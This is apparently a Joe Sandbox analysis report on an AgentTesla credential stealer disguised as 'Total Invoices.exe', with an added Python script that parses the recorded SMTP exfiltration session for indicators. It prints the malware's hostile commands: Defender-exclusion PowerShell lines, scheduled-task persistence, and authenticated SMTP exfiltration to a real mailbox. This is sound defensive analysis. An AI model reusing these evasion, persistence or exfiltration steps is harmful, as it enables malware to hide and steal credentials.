Apr 24, 2024 03:17:14.516953945 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.740236998 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.770986080 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.771238089 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.960728884 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.961005926 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.975637913 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.975637913 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.975688934 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.975688934 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:15.161464930 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:15.163530111 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:15.211072922 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:18:53.470197916 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:18:53.692650080 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:18:53.854284048 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:18:53.855979919 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:18:54.237116098 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:18:54.418075085 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 03:17:04.224824905 CEST | 64333 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 03:17:04.484842062 CEST | 53 | 64333 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 03:17:04.224824905 CEST | 192.168.2.4 | 1.1.1.1 | 0x172c | Standard query (0) | mail.unitechautomations.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 03:17:04.484842062 CEST | 1.1.1.1 | 192.168.2.4 | 0x172c | No error (0) | mail.unitechautomations.com | | 192.185.129.60 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 24, 2024 03:17:05.000096083 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 06:47:04 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 03:17:05.001365900 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | EHLO 405464
Apr 24, 2024 03:17:05.183100939 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 250-cp-ht-2.webhostbox.net Hello 405464 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 24, 2024 03:17:05.183913946 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
Apr 24, 2024 03:17:05.378051996 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Apr 24, 2024 03:17:05.663089037 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 235 Authentication succeeded
Apr 24, 2024 03:17:05.663299084 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | MAIL FROM:<design@unitechautomations.com>
Apr 24, 2024 03:17:05.846681118 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 250 OK
Apr 24, 2024 03:17:05.847342014 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | RCPT TO:<overseas1@vestalshipping.com.vn>
Apr 24, 2024 03:17:06.144768000 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 250 Accepted
Apr 24, 2024 03:17:06.144891024 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | DATA
Apr 24, 2024 03:17:06.326395035 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Apr 24, 2024 03:17:06.326885939 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60 | .
Apr 24, 2024 03:17:06.510248899 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4 | 250 OK id=1rzRFy-003iLo-0l
Apr 24, 2024 03:17:13.774615049 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4 | 220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 06:47:13 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 03:17:13.774859905 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60 | EHLO 405464
Apr 24, 2024 03:17:13.956281900 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4 | 250-cp-ht-2.webhostbox.net Hello 405464 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
                                                                                      250 HELP
                                                                                      Apr 24, 2024 03:17:13.956635952 CEST49736587192.168.2.4192.185.129.60AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
                                                                                      Apr 24, 2024 03:17:14.139702082 CEST58749736192.185.129.60192.168.2.4334 UGFzc3dvcmQ6
                                                                                      Apr 24, 2024 03:17:14.334096909 CEST58749736192.185.129.60192.168.2.4235 Authentication succeeded
                                                                                      Apr 24, 2024 03:17:14.334405899 CEST49736587192.168.2.4192.185.129.60MAIL FROM:<design@unitechautomations.com>
                                                                                      Apr 24, 2024 03:17:14.516678095 CEST58749736192.185.129.60192.168.2.4250 OK
                                                                                      Apr 24, 2024 03:17:14.516953945 CEST49736587192.168.2.4192.185.129.60RCPT TO:<overseas1@vestalshipping.com.vn>
                                                                                      Apr 24, 2024 03:17:14.770986080 CEST58749736192.185.129.60192.168.2.4250 Accepted
                                                                                      Apr 24, 2024 03:17:14.771238089 CEST49736587192.168.2.4192.185.129.60DATA
                                                                                      Apr 24, 2024 03:17:14.961005926 CEST58749736192.185.129.60192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                      Apr 24, 2024 03:17:14.975688934 CEST49736587192.168.2.4192.185.129.60.
                                                                                      Apr 24, 2024 03:17:15.163530111 CEST58749736192.185.129.60192.168.2.4250 OK id=1rzRG6-003iSC-2o
                                                                                      Apr 24, 2024 03:18:53.470197916 CEST49736587192.168.2.4192.185.129.60QUIT
                                                                                      Apr 24, 2024 03:18:53.854284048 CEST58749736192.185.129.60192.168.2.4221 cp-ht-2.webhostbox.net closing connection
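The two SMTP sessions above are the AgentTesla exfiltration channel: the client authenticates with AUTH LOGIN on port 587 without ever issuing STARTTLS, which is why the sandbox could record the commands in clear, and base64 is encoding rather than encryption, so the mailbox name (and the password reply, which the trace does not show) crossed the wire unprotected. The following script is an added example, not part of the Joe Sandbox report: it replays the second session (ports 49736 <-> 587) as constructed rows, decodes the AUTH token, tracks the 334 challenge state (handling both the AUTH LOGIN initial-response form seen here and the challenge form, as well as AUTH PLAIN), and pulls out sender, recipient, Exim queue id and whether authentication happened in plaintext. The field names in the summary are the script's own.

```python
# Added example (not part of the Joe Sandbox report): reconstruct the SMTP
# exfiltration session shown above and extract the IOCs from it.
import base64
import re
from dataclasses import dataclass, field

# Constructed from the page's trace for the 49736 <-> 587 session.
# ('C', ...) is the client 192.168.2.4, ('S', ...) the server 192.185.129.60.
# The client's base64 password reply to "334 UGFzc3dvcmQ6" is not in the trace,
# so it is deliberately absent here as well.
SESSION_49736 = [
    ("S", "220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 06:47:13 +0530\n"
          "220-We do not authorize the use of this system to transport unsolicited,\n"
          "220 and/or bulk e-mail."),
    ("C", "EHLO 405464"),
    ("S", "250-cp-ht-2.webhostbox.net Hello 405464 [154.16.105.36]\n250-SIZE 52428800\n"
          "250-8BITMIME\n250-PIPELINING\n250-PIPECONNECT\n250-AUTH PLAIN LOGIN\n"
          "250-STARTTLS\n250 HELP"),
    ("C", "AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20="),
    ("S", "334 UGFzc3dvcmQ6"),
    ("S", "235 Authentication succeeded"),
    ("C", "MAIL FROM:<design@unitechautomations.com>"),
    ("S", "250 OK"),
    ("C", "RCPT TO:<overseas1@vestalshipping.com.vn>"),
    ("S", "250 Accepted"),
    ("C", "DATA"),
    ("S", '354 Enter message, ending with "." on a line by itself'),
    ("C", "."),
    ("S", "250 OK id=1rzRG6-003iSC-2o"),
    ("C", "QUIT"),
    ("S", "221 cp-ht-2.webhostbox.net closing connection"),
]


@dataclass
class SmtpSession:
    banner: str = ""
    ehlo_name: str = ""
    advertised_auth: list = field(default_factory=list)
    offers_starttls: bool = False
    starttls_used: bool = False      # client issued STARTTLS before AUTH
    auth_mechanism: str = ""
    auth_user: str = ""              # decoded from the AUTH LOGIN/PLAIN token
    password_seen: bool = False      # a 334 "Password:" challenge was answered
    auth_ok: bool = False            # server replied 235
    mail_from: str = ""
    rcpt_to: list = field(default_factory=list)
    queue_ids: list = field(default_factory=list)


def _b64(token: str) -> str:
    """Decode an SMTP AUTH token; returns '' for anything that is not base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""


def parse_session(rows) -> SmtpSession:
    s = SmtpSession()
    prompt = None  # decoded text of an outstanding 334 challenge, if any
    for who, text in rows:
        first = text.split("\n", 1)[0]
        code = first[:3]
        if who == "S":
            prompt = _b64(first[4:].strip()) if code == "334" else None
            if code == "220" and not s.banner:
                s.banner = first[4:]
            elif code == "235":
                s.auth_ok = True
            elif code == "250":
                for line in text.split("\n"):       # EHLO extension keywords
                    kw = line[4:]
                    if kw.upper().startswith("AUTH "):
                        s.advertised_auth = kw.split()[1:]
                    elif kw.upper() == "STARTTLS":
                        s.offers_starttls = True
                if first.startswith("250 OK id="):  # Exim queue id after DATA
                    s.queue_ids.append(first.split("id=", 1)[1].strip())
            continue
        if prompt is not None:  # client answers a challenge with a bare token
            if prompt.lower().startswith("username"):
                s.auth_user = _b64(text)
            elif prompt.lower().startswith("password"):
                s.password_seen = True  # note it, never keep the secret
            prompt = None
            continue
        verb, _, arg = text.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            s.ehlo_name = arg
        elif verb == "STARTTLS":
            s.starttls_used = True
        elif verb == "AUTH":
            mech, _, initial = arg.partition(" ")
            s.auth_mechanism = mech.upper()
            if s.auth_mechanism == "LOGIN" and initial:
                s.auth_user = _b64(initial)
            elif s.auth_mechanism == "PLAIN" and initial:
                parts = _b64(initial).split("\0")   # authzid\0authcid\0password
                if len(parts) == 3:
                    s.auth_user = parts[1]
        elif verb in ("MAIL", "RCPT"):
            m = re.search(r"<([^>]*)>", arg)
            addr = m.group(1) if m else arg.split(":", 1)[-1]
            if verb == "MAIL":
                s.mail_from = addr
            else:
                s.rcpt_to.append(addr)
    return s


def exfil_summary(s: SmtpSession) -> dict:
    return {
        "mail_server": s.banner.split()[0] if s.banner else "",
        "client_name": s.ehlo_name,
        "auth": f"{s.auth_mechanism} as {s.auth_user}",
        "authenticated": s.auth_ok,
        "plaintext_auth": s.auth_ok and not s.starttls_used,
        "from": s.mail_from,
        "to": s.rcpt_to,
        "queue_ids": s.queue_ids,
    }


if __name__ == "__main__":
    for k, v in exfil_summary(parse_session(SESSION_49736)).items():
        print(f"{k}: {v}")
```

Run as-is it prints the authenticated mailbox, the recipient and the queue id for the session; for a live capture the same parser can be fed the client/server lines of each TCP stream, and `plaintext_auth` is the field to alert on when a sandbox or IDS sees AUTH on 587 with no preceding STARTTLS.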

                                                                                      Target ID:0
                                                                                      Start time:03:16:54
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Total Invoices.exe"
                                                                                      Imagebase:0xba0000
                                                                                      File size:807'936 bytes
                                                                                      MD5 hash:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
                                                                                      Imagebase:0x920000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
                                                                                      Imagebase:0x920000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                      Imagebase:0xd60000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:03:17:02
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      Imagebase:0xb10000
                                                                                      File size:807'936 bytes
                                                                                      MD5 hash:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 61%, ReversingLabs
                                                                                      • Detection: 32%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:03:17:03
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0x7ff693ab0000
                                                                                      File size:496'640 bytes
                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                      Imagebase:0x530000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:15
                                                                                      Start time:03:17:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                                      Imagebase:0x7b0000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:16
                                                                                      Start time:03:17:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:19
                                                                                      Start time:03:17:21
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                                      Imagebase:0xb10000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:20
                                                                                      Start time:03:17:21
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:212
                                                                                        Total number of Limit Nodes:16

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @"5$L"5$L"5$P#5$P#5$P#5$P#5
                                                                                        • API String ID: 0-3566619598
                                                                                        • Opcode ID: 66dbbad4a2912cbf641e76fdad9f57593a5086f9ad0f4254b8726375bd8e49a3
                                                                                        • Instruction ID: 59bc6f4973065dc2575766aed9d8e12aaecbe1efac361ab1b12010279520c6b0
                                                                                        • Opcode Fuzzy Hash: 66dbbad4a2912cbf641e76fdad9f57593a5086f9ad0f4254b8726375bd8e49a3
                                                                                        • Instruction Fuzzy Hash: E032AA34B412058FDB19DB79E554BAEB7F6AF88704F2484A9E106AB3A0CF35ED01CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 015ED11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 015ED1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 6c2610ceb10b56c0b40238e8b7976c5fa21b7b6dacef9077fdcd51e612d3b142
                                                                                        • Instruction ID: 408b7c6772234c12f082d0f824bfe5a29f27a6d4eb86d47d8647a5506a593b86
                                                                                        • Opcode Fuzzy Hash: 6c2610ceb10b56c0b40238e8b7976c5fa21b7b6dacef9077fdcd51e612d3b142
                                                                                        • Instruction Fuzzy Hash: 6C5166B0D00249CFDB18DFA9D648BAEBBF1BF88314F208459D019AB260DB359885CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 015ED11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 015ED1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 0a3f2784571ff52571bb22a8a0dda87147c00a6641b559640324caa5590e8924
                                                                                        • Instruction ID: 762af5910ed9226d4d23ffe8e29ac45c278b32526509c9ff54194bc2a921a9be
